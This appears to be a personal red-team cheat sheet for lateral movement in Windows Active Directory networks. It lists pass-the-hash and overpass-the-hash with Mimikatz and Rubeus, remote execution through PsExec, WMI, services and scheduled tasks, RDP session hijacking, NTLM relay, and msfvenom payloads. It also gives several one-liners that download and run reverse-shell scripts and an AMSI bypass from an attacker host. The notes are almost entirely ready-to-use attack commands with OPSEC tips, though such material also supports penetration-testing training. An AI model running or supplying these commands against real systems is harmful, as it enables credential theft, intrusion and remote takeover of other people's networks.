Add domain user to the local Administrators group
net localgroup Administrators <DOMAIN>\<USER> /add
Connect to a machine with administrator privileges
Enter-PSSession -Computername <COMPUTERNAME>
$sess = New-PSSession -Computername <COMPUTERNAME>
Enter-PSSession $sess
PSRemoting NTLM authentication (after overpass the hash)
Enter-PSSession -ComputerName <COMPUTERNAME> -Authentication Negotiate
Execute commands on a machine
Invoke-Command -Computername <COMPUTERNAME> -Scriptblock {<COMMAND>}
Invoke-Command -Scriptblock {<COMMAND>} -Session $sess
Invoke-Command -Computername <COMPUTERNAME> -FilePath <PATH>
Invoke-Command -FilePath <PATH> -Session $sess
Execute locally loaded function on a list of remote machines
Invoke-Command -Scriptblock ${function:<function>} -Computername (Get-Content computers.txt)
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Computername (Get-Content computers.txt)
runas /netonly /user:<DOMAIN>\<USER> cmd.exe
runas /netonly /user:<DOMAIN>\<USER> powershell.exe
Remote port forward with socat on Windows (pivot host)
socat.exe tcp-listen:<LISTENING PORT>,fork tcp-connect:<TARGET IP SECOND HOP>:<TARGET PORT>
Then let socat listen on our Kali machine as well,
so we can connect with our Windows tool, for example
socat tcp-l:<LISTENING PORT>,fork tcp:<TARGET IP TO SEND IT TO (FIRST HOP)>:<TARGET PORT>
.\psexec_windows.exe -hashes <LM HASH>:<NTLM HASH> <DOMAIN>/<USER>@<COMPUTERNAME>
Requires elevated privileges to execute commands
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> -X <COMMAND>
Invoke-SMBExec -Target <COMPUTERNAME> -Domain <DOMAIN> -Username <USERNAME> -Hash <NTLM HASH> -Command <COMMAND> -Verbose
Seems to only work with a password or after an overpass-the-hash attack with Mimikatz!
.\PsExec64.exe \\<COMPUTERNAME> -accepteula -u <DOMAIN>\<ADMINISTRATOR> -p <PASSWORD> cmd.exe
.\PsExec64.exe \\<COMPUTERNAME> -accepteula
Overpass the hash (OPTH) generates Kerberos tokens from hashes or keys. Needs elevation (run as administrator)
OPSEC TIP: Use aes256 keys!
.\Rubeus.exe hash /password:<PASSWORD> /user:<USER> /domain:<DOMAIN>
Mimikatz overpass the hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<DOMAIN> /aes256:<AES256KEYS> /run:powershell.exe"'
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH> /run:powershell.exe"'
SafetyKatz.exe "sekurlsa::pth /user:<USER> /domain:<DOMAIN> /aes256:<AES256KEYS> /run:cmd.exe" "exit"
The commands below don't need elevation
Rubeus.exe asktgt /user:<USER> /rc4:<NTLM HASH> /domain:<DOMAIN> /nowrap /ptt
Rubeus.exe asktgt /user:<USER> /aes256:<AES256KEYS> /domain:<DOMAIN> /opsec /nowrap /ptt
The command below needs elevation
Rubeus.exe asktgt /user:<USER> /aes256:<AES256KEYS> /domain:<DOMAIN> /opsec /nowrap /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Enter-PSSession -ComputerName <NAME>
$sess = New-PSSession <SERVER> -Credential <DOMAIN>\<USER>
Invoke-Command -Scriptblock {hostname; whoami;} -Session $sess
Overpass the hash with Mimikatz, reverse shell
powercat -l -v -p 444 -t 5000
$sess = New-PSSession <SERVER>
# The .ps1 is a reverse shell back to the attacker machine; make sure you run it as the user you want
$Contents = 'powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(''http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1''))'; Out-File -Encoding Ascii -InputObject $Contents -FilePath reverse.bat
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH> /run:C:\reverse.bat"'
cme smb <COMPUTERLIST> -d <DOMAIN> -u <USER> -H <NTLM HASH>
Find-LocalAdminAccess -Verbose
. ./Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess
. ./Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
C:\Users\Public\Loader.exe -path http://xx.xx.xx.xx/something.exe
Use the custom AssemblyLoad.exe to run the loader in memory and then load the binary
C:\Users\Public\AssemblyLoad.exe http://xx.xx.xx.xx/Loader.exe -path http://xx.xx.xx.xx/something.exe
Lateral Movement Techniques
Save the PSSession in a variable
$sess = New-PSSession -Credential $creds -ComputerName <IP>
Invoke-Command -ScriptBlock {<COMMAND>} -Session $sess
Run commands on multiple machines
Invoke-Command -Scriptblock {<COMMAND>} -ComputerName (Get-Content computers.txt)
Invoke-Command -FilePath <PATH TO SCRIPT> -Session $sess
Execute script on multiple machines
Invoke-Command -FilePath script.ps1 -ComputerName (Get-Content computers.txt)
Execute locally loaded function on remote machines:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content computers.txt)
Copy item through PSSession
Copy-Item -ToSession $sess -Path <PATH> -Destination <DEST> -Verbose
psexec.exe -u <DOMAIN>\<USER> -p <PASSWORD> \\<TARGET> cmd.exe
python psexec.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
Smbexec.py can be used to automate the process
sc.exe \\<TARGET> create SERVICE_NAME displayname= NAME binpath= "COMMAND" start= demand
sc.exe \\<TARGET> start SERVICE_NAME
sc.exe \\<TARGET> delete SERVICE_NAME
schtasks /create /F /tn <TASKNAME> /tr COMMAND /sc once /st 23:00 /s <TARGET> /U <USER> /P <PASSWORD>
schtasks /run /F /tn <TASKNAME> /s <TARGET> /U <USER> /P <PASSWORD>
schtasks /delete /F /tn <TASKNAME> /s <TARGET>
wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
Pass the hash over RDP with xfreerdp
xfreerdp /u:<USER> /d:<DOMAIN> /pth:<NTLM HASH> /v:<TARGET>
Invoke-Mimikatz -Command "sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<NTLM HASH> /run:'mstsc.exe /restrictedadmin'"
If Restricted Admin mode is disabled, enable it on the target:
Enter-PSSession -Computername <TARGET>
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
RDP session hijack via tscon
query user
sc.exe create rdphijack binpath= "cmd.exe /c tscon <ID> /dest:<SESSION NAME>"
net start rdphijack
sc.exe delete rdphijack
Accessing RDP credentials
Complicated; I have to access eCPPTX again and try it out
SCShell.exe <TARGET> XblAuthManager "C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://<PAYLOAD WEBSITE>/payload.sct scrobj.dll" . <USER> <PASSWORD>
SCShell.py
Invoke-Pbing -Target <TARGET> -Domain <DOMAIN> -User <USER> -Password <PASSWORD>
Install PowerShell Web Access on the target
Install-WindowsFeature -Name WindowsPowerShellWebAccess
Install-PswaWebApplication -UseTestCertificate
Add-PswaAuthorizationRule -Username <USERNAME> -Computername <COMPUTER> -ConfigurationName <CONFIG NAME>
CrackMapExec: list hosts with SMB signing disabled
crackmapexec smb <CIDR> --gen-relay-list <OUTPUT FILE>
Edit the Responder config file to disable the HTTP server and SMB server
ntlmrelayx.py -t <TARGET> -c 'powershell.exe iex (New-Object Net.WebClient).DownloadString("http://<ATTACKER IP>/Invoke-PowerShellTcp.ps1")' -smb2support
responder -I <INTERFACE> -v
# Meterpreter ps1 rev shell
msfvenom -p windows/x64/meterpreter_reverse_https -f psh -o msf.ps1 lhost=<HOST> lport=<PORT> exitfunc=thread
# Meterpreter bind tcp executable
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=<HOST> LPORT=<PORT> -f exe -o bind_tcp.exe
# Meterpreter reverse tcp executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<HOST> LPORT=<PORT> -f exe > shell.exe
# Bat file to run reverse powershell
msfvenom -p cmd/windows/reverse_powershell LHOST=<HOST> LPORT=<PORT> > attach.bat
powershell.exe -c "iex (New-Object Net.WebClient).DownloadString('http://<IP>/amsi.txt'); iex (New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp2.ps1')"